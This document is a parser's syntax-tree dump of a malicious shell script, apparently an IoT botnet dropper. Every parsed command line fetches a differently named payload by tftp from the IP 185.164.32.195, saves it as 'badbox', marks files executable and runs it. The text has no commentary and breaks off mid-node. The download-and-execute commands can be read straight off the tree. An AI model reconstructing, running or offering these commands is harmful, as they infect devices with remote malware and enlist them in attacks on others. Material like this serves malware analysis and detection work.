CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 169), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 133), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 115), word='sdd'),
    WordNode(lineno=4, pos=(116, 118), word='-g'),
    WordNode(lineno=4, pos=(119, 133), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(133, 134)),
  CommandNode(lineno=4, pos=(134, 149), parts=[
    WordNode(lineno=4, pos=(134, 137), word='cat'),
    WordNode(lineno=4, pos=(138, 141), word='sdd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(143, 149), word='badbox'), pos=(142, 149), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(149, 150)),
  CommandNode(lineno=4, pos=(150, 160), parts=[
    WordNode(lineno=4, pos=(150, 155), word='chmod'),
    WordNode(lineno=4, pos=(156, 158), word='+x'),
    WordNode(lineno=4, pos=(159, 160), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(160, 161)),
  CommandNode(lineno=4, pos=(161, 169), parts=[
    WordNode(lineno=4, pos=(161, 169), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(170, 292), parts=[
  CommandNode(lineno=5, pos=(170, 177), parts=[
    WordNode(lineno=5, pos=(170, 172), word='cd'),
    WordNode(lineno=5, pos=(173, 177), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(178, 180)),
  CommandNode(lineno=5, pos=(181, 192), parts=[
    WordNode(lineno=5, pos=(181, 183), word='cd'),
    WordNode(lineno=5, pos=(184, 192), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(193, 195)),
  CommandNode(lineno=5, pos=(196, 203), parts=[
    WordNode(lineno=5, pos=(196, 198), word='cd'),
    WordNode(lineno=5, pos=(199, 203), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(204, 206)),
  CommandNode(lineno=5, pos=(207, 215), parts=[
    WordNode(lineno=5, pos=(207, 209), word='cd'),
    WordNode(lineno=5, pos=(210, 215), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(216, 218)),
  CommandNode(lineno=5, pos=(219, 223), parts=[
    WordNode(lineno=5, pos=(219, 221), word='cd'),
    WordNode(lineno=5, pos=(222, 223), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(223, 224)),
  CommandNode(lineno=5, pos=(225, 255), parts=[
    WordNode(lineno=5, pos=(225, 229), word='tftp'),
    WordNode(lineno=5, pos=(230, 232), word='-r'),
    WordNode(lineno=5, pos=(233, 237), word='asss'),
    WordNode(lineno=5, pos=(238, 240), word='-g'),
    WordNode(lineno=5, pos=(241, 255), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(255, 256)),
  CommandNode(lineno=5, pos=(256, 272), parts=[
    WordNode(lineno=5, pos=(256, 259), word='cat'),
    WordNode(lineno=5, pos=(260, 264), word='asss'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(266, 272), word='badbox'), pos=(265, 272), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(272, 273)),
  CommandNode(lineno=5, pos=(273, 283), parts=[
    WordNode(lineno=5, pos=(273, 278), word='chmod'),
    WordNode(lineno=5, pos=(279, 281), word='+x'),
    WordNode(lineno=5, pos=(282, 283), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(283, 284)),
  CommandNode(lineno=5, pos=(284, 292), parts=[
    WordNode(lineno=5, pos=(284, 292), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(293, 415), parts=[
  CommandNode(lineno=6, pos=(293, 300), parts=[
    WordNode(lineno=6, pos=(293, 295), word='cd'),
    WordNode(lineno=6, pos=(296, 300), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(301, 303)),
  CommandNode(lineno=6, pos=(304, 315), parts=[
    WordNode(lineno=6, pos=(304, 306), word='cd'),
    WordNode(lineno=6, pos=(307, 315), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(316, 318)),
  CommandNode(lineno=6, pos=(319, 326), parts=[
    WordNode(lineno=6, pos=(319, 321), word='cd'),
    WordNode(lineno=6, pos=(322, 326), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(327, 329)),
  CommandNode(lineno=6, pos=(330, 338), parts=[
    WordNode(lineno=6, pos=(330, 332), word='cd'),
    WordNode(lineno=6, pos=(333, 338), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(339, 341)),
  CommandNode(lineno=6, pos=(342, 346), parts=[
    WordNode(lineno=6, pos=(342, 344), word='cd'),
    WordNode(lineno=6, pos=(345, 346), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(346, 347)),
  CommandNode(lineno=6, pos=(348, 378), parts=[
    WordNode(lineno=6, pos=(348, 352), word='tftp'),
    WordNode(lineno=6, pos=(353, 355), word='-r'),
    WordNode(lineno=6, pos=(356, 360), word='sdff'),
    WordNode(lineno=6, pos=(361, 363), word='-g'),
    WordNode(lineno=6, pos=(364, 378), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(378, 379)),
  CommandNode(lineno=6, pos=(379, 395), parts=[
    WordNode(lineno=6, pos=(379, 382), word='cat'),
    WordNode(lineno=6, pos=(383, 387), word='sdff'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(389, 395), word='badbox'), pos=(388, 395), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(395, 396)),
  CommandNode(lineno=6, pos=(396, 406), parts=[
    WordNode(lineno=6, pos=(396, 401), word='chmod'),
    WordNode(lineno=6, pos=(402, 404), word='+x'),
    WordNode(lineno=6, pos=(405, 406), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(406, 407)),
  CommandNode(lineno=6, pos=(407, 415), parts=[
    WordNode(lineno=6, pos=(407, 415), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(416, 538), parts=[
  CommandNode(lineno=7, pos=(416, 423), parts=[
    WordNode(lineno=7, pos=(416, 418), word='cd'),
    WordNode(lineno=7, pos=(419, 423), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(424, 426)),
  CommandNode(lineno=7, pos=(427, 438), parts=[
    WordNode(lineno=7, pos=(427, 429), word='cd'),
    WordNode(lineno=7, pos=(430, 438), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(439, 441)),
  CommandNode(lineno=7, pos=(442, 449), parts=[
    WordNode(lineno=7, pos=(442, 444), word='cd'),
    WordNode(lineno=7, pos=(445, 449), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(450, 452)),
  CommandNode(lineno=7, pos=(453, 461), parts=[
    WordNode(lineno=7, pos=(453, 455), word='cd'),
    WordNode(lineno=7, pos=(456, 461), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(462, 464)),
  CommandNode(lineno=7, pos=(465, 469), parts=[
    WordNode(lineno=7, pos=(465, 467), word='cd'),
    WordNode(lineno=7, pos=(468, 469), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(469, 470)),
  CommandNode(lineno=7, pos=(471, 501), parts=[
    WordNode(lineno=7, pos=(471, 475), word='tftp'),
    WordNode(lineno=7, pos=(476, 478), word='-r'),
    WordNode(lineno=7, pos=(479, 483), word='fgfd'),
    WordNode(lineno=7, pos=(484, 486), word='-g'),
    WordNode(lineno=7, pos=(487, 501), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(501, 502)),
  CommandNode(lineno=7, pos=(502, 518), parts=[
    WordNode(lineno=7, pos=(502, 505), word='cat'),
    WordNode(lineno=7, pos=(506, 510), word='fgfd'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(512, 518), word='badbox'), pos=(511, 518), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(518, 519)),
  CommandNode(lineno=7, pos=(519, 529), parts=[
    WordNode(lineno=7, pos=(519, 524), word='chmod'),
    WordNode(lineno=7, pos=(525, 527), word='+x'),
    WordNode(lineno=7, pos=(528, 529), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(529, 530)),
  CommandNode(lineno=7, pos=(530, 538), parts=[
    WordNode(lineno=7, pos=(530, 538), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(539, 661), parts=[
  CommandNode(lineno=8, pos=(539, 546), parts=[
    WordNode(lineno=8, pos=(539, 541), word='cd'),
    WordNode(lineno=8, pos=(542, 546), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(547, 549)),
  CommandNode(lineno=8, pos=(550, 561), parts=[
    WordNode(lineno=8, pos=(550, 552), word='cd'),
    WordNode(lineno=8, pos=(553, 561), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(562, 564)),
  CommandNode(lineno=8, pos=(565, 572), parts=[
    WordNode(lineno=8, pos=(565, 567), word='cd'),
    WordNode(lineno=8, pos=(568, 572), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(573, 575)),
  CommandNode(lineno=8, pos=(576, 584), parts=[
    WordNode(lineno=8, pos=(576, 578), word='cd'),
    WordNode(lineno=8, pos=(579, 584), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(585, 587)),
  CommandNode(lineno=8, pos=(588, 592), parts=[
    WordNode(lineno=8, pos=(588, 590), word='cd'),
    WordNode(lineno=8, pos=(591, 592), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(592, 593)),
  CommandNode(lineno=8, pos=(594, 624), parts=[
    WordNode(lineno=8, pos=(594, 598), word='tftp'),
    WordNode(lineno=8, pos=(599, 601), word='-r'),
    WordNode(lineno=8, pos=(602, 606), word='gfgd'),
    WordNode(lineno=8, pos=(607, 609), word='-g'),
    WordNode(lineno=8, pos=(610, 624), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(624, 625)),
  CommandNode(lineno=8, pos=(625, 641), parts=[
    WordNode(lineno=8, pos=(625, 628), word='cat'),
    WordNode(lineno=8, pos=(629, 633), word='gfgd'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(635, 641), word='badbox'), pos=(634, 641), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(641, 642)),
  CommandNode(lineno=8, pos=(642, 652), parts=[
    WordNode(lineno=8, pos=(642, 647), word='chmod'),
    WordNode(lineno=8, pos=(648, 650), word='+x'),
    WordNode(lineno=8, pos=(651, 652), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(652, 653)),
  CommandNode(lineno=8, pos=(653, 661), parts=[
    WordNode(lineno=8, pos=(653, 661), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(662, 786), parts=[
  CommandNode(lineno=9, pos=(662, 669), parts=[
    WordNode(lineno=9, pos=(662, 664), word='cd'),
    WordNode(lineno=9, pos=(665, 669), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(670, 672)),
  CommandNode(lineno=9, pos=(673, 684), parts=[
    WordNode(lineno=9, pos=(673, 675), word='cd'),
    WordNode(lineno=9, pos=(676, 684), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(685, 687)),
  CommandNode(lineno=9, pos=(688, 695), parts=[
    WordNode(lineno=9, pos=(688, 690), word='cd'),
    WordNode(lineno=9, pos=(691, 695), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(696, 698)),
  CommandNode(lineno=9, pos=(699, 707), parts=[
    WordNode(lineno=9, pos=(699, 701), word='cd'),
    WordNode(lineno=9, pos=(702, 707), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(708, 710)),
  CommandNode(lineno=9, pos=(711, 715), parts=[
    WordNode(lineno=9, pos=(711, 713), word='cd'),
    WordNode(lineno=9, pos=(714, 715), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(715, 716)),
  CommandNode(lineno=9, pos=(717, 748), parts=[
    WordNode(lineno=9, pos=(717, 721), word='tftp'),
    WordNode(lineno=9, pos=(722, 724), word='-r'),
    WordNode(lineno=9, pos=(725, 730), word='ssaaa'),
    WordNode(lineno=9, pos=(731, 733), word='-g'),
    WordNode(lineno=9, pos=(734, 748), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(748, 749)),
  CommandNode(lineno=9, pos=(749, 766), parts=[
    WordNode(lineno=9, pos=(749, 752), word='cat'),
    WordNode(lineno=9, pos=(753, 758), word='ssaaa'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(760, 766), word='badbox'), pos=(759, 766), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(766, 767)),
  CommandNode(lineno=9, pos=(767, 777), parts=[
    WordNode(lineno=9, pos=(767, 772), word='chmod'),
    WordNode(lineno=9, pos=(773, 775), word='+x'),
    WordNode(lineno=9, pos=(776, 777), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(777, 778)),
  CommandNode(lineno=9, pos=(778, 786), parts=[
    WordNode(lineno=9, pos=(778, 786), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(787, 911), parts=[
  CommandNode(lineno=10, pos=(787, 794), parts=[
    WordNode(lineno=10, pos=(787, 789), word='cd'),
    WordNode(lineno=10, pos=(790, 794), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(795, 797)),
  CommandNode(lineno=10, pos=(798, 809), parts=[
    WordNode(lineno=10, pos=(798, 800), word='cd'),
    WordNode(lineno=10, pos=(801, 809), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(810, 812)),
  CommandNode(lineno=10, pos=(813, 820), parts=[
    WordNode(lineno=10, pos=(813, 815), word='cd'),
    WordNode(lineno=10, pos=(816, 820), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(821, 823)),
  CommandNode(lineno=10, pos=(824, 832), parts=[
    WordNode(lineno=10, pos=(824, 826), word='cd'),
    WordNode(lineno=10, pos=(827, 832), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(833, 835)),
  CommandNode(lineno=10, pos=(836, 840), parts=[
    WordNode(lineno=10, pos=(836, 838), word='cd'),
    WordNode(lineno=10, pos=(839, 840), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(840, 841)),
  CommandNode(lineno=10, pos=(842, 873), parts=[
    WordNode(lineno=10, pos=(842, 846), word='tftp'),
    WordNode(lineno=10, pos=(847, 849), word='-r'),
    WordNode(lineno=10, pos=(850, 855), word='swerf'),
    WordNode(lineno=10, pos=(856, 858), word='-g'),
    WordNode(lineno=10, pos=(859, 873), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(873, 874)),
  CommandNode(lineno=10, pos=(874, 891), parts=[
    WordNode(lineno=10, pos=(874, 877), word='cat'),
    WordNode(lineno=10, pos=(878, 883), word='swerf'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(885, 891), word='badbox'), pos=(884, 891), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(891, 892)),
  CommandNode(lineno=10, pos=(892, 902), parts=[
    WordNode(lineno=10, pos=(892, 897), word='chmod'),
    WordNode(lineno=10, pos=(898, 900), word='+x'),
    WordNode(lineno=10, pos=(901, 902), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(902, 903)),
  CommandNode(lineno=10, pos=(903, 911), parts=[
    WordNode(lineno=10, pos=(903, 911), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(912, 1034), parts=[
  CommandNode(lineno=11, pos=(912, 919), parts=[
    WordNode(lineno=11, pos=(912, 914), word='cd'),
    WordNode(lineno=11, pos=(915, 919), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(920, 922)),
  CommandNode(lineno=11, pos=(923, 934), parts=[
    WordNode(lineno=11, pos=(923, 925), word='cd'),
    WordNode(lineno=11, pos=(926, 934), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(935, 937)),
  CommandNode(lineno=11, pos=(938, 945), parts=[
    WordNode(lineno=11, pos=(938, 940), word='cd'),
    WordNode(lineno=11, pos=(941, 945), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(946, 948)),
  CommandNode(lineno=11, pos=(949, 957), parts=[
    WordNode(lineno=11, pos=(949, 951), word='cd'),
    WordNode(lineno=11, pos=(952, 957), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(958, 960)),
  CommandNode(lineno=11, pos=(961, 965), parts=[
    WordNode(lineno=11, pos=(961, 963), word='cd'),
    WordNode(lineno=11, pos=(964, 965), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(965, 966)),
  CommandNode(lineno=11, pos=(967, 997), parts=[
    WordNode(lineno=11, pos=(967, 971), word='tftp'),
    WordNode(lineno=11, pos=(972, 974), word='-r'),
    WordNode(lineno=11, pos=(975, 979), word='ggbv'),
    WordNode(lineno=11, pos=(980, 982), word='-g'),
    WordNode(lineno=11, pos=(983, 997), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(997, 998)),
  CommandNode(lineno=11, pos=(998, 1014), parts=[
    WordNode(lineno=11, pos=(998, 1001), word='cat'),
    WordNode(lineno=11, pos=(1002, 1006), word='ggbv'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1008, 1014), word='badbox'), pos=(1007, 1014), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1014, 1015)),
  CommandNode(lineno=11, pos=(1015, 1025), parts=[
    WordNode(lineno=11, pos=(1015, 1020), word='chmod'),
    WordNode(lineno=11, pos=(1021, 1023), word='+x'),
    WordNode(lineno=11, pos=(1024, 1025), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1025, 1026)),
  CommandNode(lineno=11, pos=(1026, 1034), parts=[
    WordNode(lineno=11, pos=(1026, 1034), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1035, 1157), parts=[
  CommandNode(lineno=12, pos=(1035, 1042), parts=[
    WordNode(lineno=12, pos=(1035, 1037), word='cd'),
    WordNode(lineno=12, pos=(1038, 1042), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1043, 1045)),
  CommandNode(lineno=12, pos=(1046, 1057), parts=[
    WordNode(lineno=12, pos=(1046, 1048), word='cd'),
    WordNode(lineno=12, pos=(1049, 1057), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1058, 1060)),
  CommandNode(lineno=12, pos=(1061, 1068), parts=[
    WordNode(lineno=12, pos=(1061, 1063), word='cd'),
    WordNode(lineno=12, pos=(1064, 1068), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1069, 1071)),
  CommandNode(lineno=12, pos=(1072, 1080), parts=[
    WordNode(lineno=12, pos=(1072, 1074), word='cd'),
    WordNode(lineno=12, pos=(1075, 1080), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1081, 1083)),
  CommandNode(lineno=12, pos=(1084, 1088), parts=[
    WordNode(lineno=12, pos=(1084, 1086), word='cd'),
    WordNode(lineno=12, pos=(1087, 1088), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1088, 1089)),
  CommandNode(lineno=12, pos=(1090, 1120), parts=[
    WordNode(lineno=12, pos=(1090, 1094), word='tftp'),
    WordNode(lineno=12, pos=(1095, 1097), word='-r'),
    WordNode(lineno=12, pos=(1098, 1102), word='dffd'),
    WordNode(lineno=12, pos=(1103, 1105), word='-g'),
    WordNode(lineno=12, pos=(1106, 1120), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1120, 1121)),
  CommandNode(lineno=12, pos=(1121, 1137), parts=[
    WordNode(lineno=12, pos=(1121, 1124), word='cat'),
    WordNode(lineno=12, pos=(1125, 1129), word='dffd'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1131, 1137), word='badbox'), pos=(1130, 1137), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1137, 1138)),
  CommandNode(lineno=12, pos=(1138, 1148), parts=[
    WordNode(lineno=12, pos=(1138, 1143), word='chmod'),
    WordNode(lineno=12, pos=(1144, 1146), word='+x'),
    WordNode(lineno=12, pos=(1147, 1148), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1148, 1149)),
  CommandNode(lineno=12, pos=(1149, 1157), parts=[
    WordNode(lineno=12, pos=(1149, 1157), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1158, 1280), parts=[
  CommandNode(lineno=13, pos=(1158, 1165), parts=[
    WordNode(lineno=13, pos=(1158, 1160), word='cd'),
    WordNode(lineno=13, pos=(1161, 1165), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1166, 1168)),
  CommandNode(lineno=13, pos=(1169, 1180), parts=[
    WordNode(lineno=13, pos=(1169, 1171), word='cd'),
    WordNode(lineno=13, pos=(1172, 1180), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1181, 1183)),
  CommandNode(lineno=13, pos=(1184, 1191), parts=[
    WordNode(lineno=13, pos=(1184, 1186), word='cd'),
    WordNode(lineno=13, pos=(1187, 1191), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1192, 1194)),
  CommandNode(lineno=13, pos=(1195, 1203), parts=[
    WordNode(lineno=13, pos=(1195, 1197), word='cd'),
    WordNode(lineno=13, pos=(1198, 1203), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1204, 1206)),
  CommandNode(lineno=13, pos=(1207, 1211), parts=[
    WordNode(lineno=13, pos=(1207, 1209), word='cd'),
    WordNode(lineno=13, pos=(1210, 1211), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1211, 1212)),
  CommandNode(lineno=13, pos=(1213, 1243), parts=[
    WordNode(lineno=13, pos=(1213, 1217), word='tftp'),
    WordNode(lineno=13, pos=(1218, 1220), word='-r'),
    WordNode(lineno=13, pos=(1221, 1225), word='dsds'),
    WordNode(lineno=13, pos=(1226, 1228), word='-g'),
    WordNode(lineno=13, pos=(1229, 1243), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1243, 1244)),
  CommandNode(lineno=13, pos=(1244, 1260), parts=[
    WordNode(lineno=13, pos=(1244, 1247), word='cat'),
    WordNode(lineno=13, pos=(1248, 1252), word='dsds'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1254, 1260), word='badbox'), pos=(1253, 1260), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1260, 1261)),
  CommandNode(lineno=13, pos=(1261, 1271), parts=[
    WordNode(lineno=13, pos=(1261, 1266), word='chmod'),
    WordNode(lineno=13, pos=(1267, 1269), word='+x'),
    WordNode(lineno=13, pos=(1270, 1271), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1271, 1272)),
  CommandNode(lineno=13, pos=(1272, 1280), parts=[
    WordNode(lineno=13, pos=(1272, 1280), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1281, 1401), parts=[
  CommandNode(lineno=14, pos=(1281, 1288), parts=[
    WordNode(lineno=14, pos=(1281, 1283), word='cd'),
    WordNode(lineno=14, pos=(1284, 1288), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1289, 1291)),
  CommandNode(lineno=14, pos=(1292, 1303), parts=[
    WordNode(lineno=14, pos=(1292, 1294), word='cd'),
    WordNode(lineno=14, pos=(1295, 1303), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1304, 1306)),
  CommandNode(lineno=14, pos=(1307, 1314), parts=[
    WordNode(lineno=14, pos=(1307, 1309), word='cd'),
    WordNode(lineno=14, pos=(1310, 1314), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1315, 1317)),
  CommandNode(lineno=14, pos=(1318, 1326), parts=[
    WordNode(lineno=14, pos=(1318, 1320), word='cd'),
    WordNode(lineno=14, pos=(1321, 1326), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1327, 1329)),
  CommandNode(lineno=14, pos=(1330, 1334), parts=[
    WordNode(lineno=14, pos=(1330, 1332), word='cd'),
    WordNode(lineno=14, pos=(1333, 1334), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1334, 1335)),
  CommandNode(lineno=14, pos=(1336, 1365), parts=[
    WordNode(lineno=14, pos=(1336, 1340), word='tftp'),
    WordNode(lineno=14, pos=(1341, 1343), word='-r'),
    WordNode(lineno=14, pos=(1344, 1347), word='zxc'),
    WordNode(lineno=14, pos=(1348, 1350), word='-g'),
    WordNode(lineno=14, pos=(1351, 1365), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1365, 1366)),
  CommandNode(lineno=14, pos=(1366, 1381), parts=[
    WordNode(lineno=14, pos=(1366, 1369), word='cat'),
    WordNode(lineno=14, pos=(1370, 1373), word='zxc'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1375, 1381), word='badbox'), pos=(1374, 1381), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1381, 1382)),
  CommandNode(lineno=14, pos=(1382, 1392), parts=[
    WordNode(lineno=14, pos=(1382, 1387), word='chmod'),
    WordNode(lineno=14, pos=(1388, 1390), word='+x'),
    WordNode(lineno=14, pos=(1391, 1392), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1392, 1393)),
  CommandNode(lineno=14, pos=(1393, 1401), parts=[
    WordNode(lineno=14, pos=(1393, 1401), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1402, 1522), parts=[
  CommandNode(lineno=15, pos=(1402, 1409), parts=[
    WordNode(lineno=15, pos=(1402, 1404), word='cd'),
    WordNode(lineno=15, pos=(1405, 1409), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1410, 1412)),
  CommandNode(lineno=15, pos=(1413, 1424), parts=[
    WordNode(lineno=15, pos=(1413, 1415), word='cd'),
    WordNode(lineno=15, pos=(1416, 1424), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1425, 1427)),
  CommandNode(lineno=15, pos=(1428, 1435), parts=[
    WordNode(lineno=15, pos=(1428, 1430), word='cd'),
    WordNode(lineno=15, pos=(1431, 1435), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1436, 1438)),
  CommandNode(lineno=15, pos=(1439, 1447), parts=[
    WordNode(lineno=15, pos=(1439, 1441), word='cd'),
    WordNode(lineno=15, pos=(1442, 1447), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1448, 1450)),
  CommandNode(lineno=15, pos=(1451, 1455), parts=[
    WordNode(lineno=15, pos=(1451, 1453), word='cd'),
    WordNode(lineno=15, pos=(1454, 1455), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1455, 1456)),
  CommandNode(lineno=15, pos=(1457, 1486), parts=[
    WordNode(lineno=15, pos=(1457, 1461), word='tftp'),
    WordNode(lineno=15, pos=(1462, 1464), word='-r'),
    WordNode(lineno=15, pos=(1465, 1468), word='vcx'),
    WordNode(lineno=15, pos=(1469, 1471), word='-g'),
    WordNode(lineno=15, pos=(1472, 1486), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1486, 1487)),
  CommandNode(lineno=15, pos=(1487, 1502), parts=[
    WordNode(lineno=15, pos=(1487, 1490), word='cat'),
    WordNode(lineno=15, pos=(1491, 1494), word='vcx'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1496, 1502), word='badbox'), pos=(1495, 1502), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1502, 1503)),
  CommandNode(lineno=15, pos=(1503, 1513), parts=[
    WordNode(lineno=15, pos=(1503, 1508), word='chmod'),
    WordNode(lineno=15, pos=(1509, 1511), word='+x'),
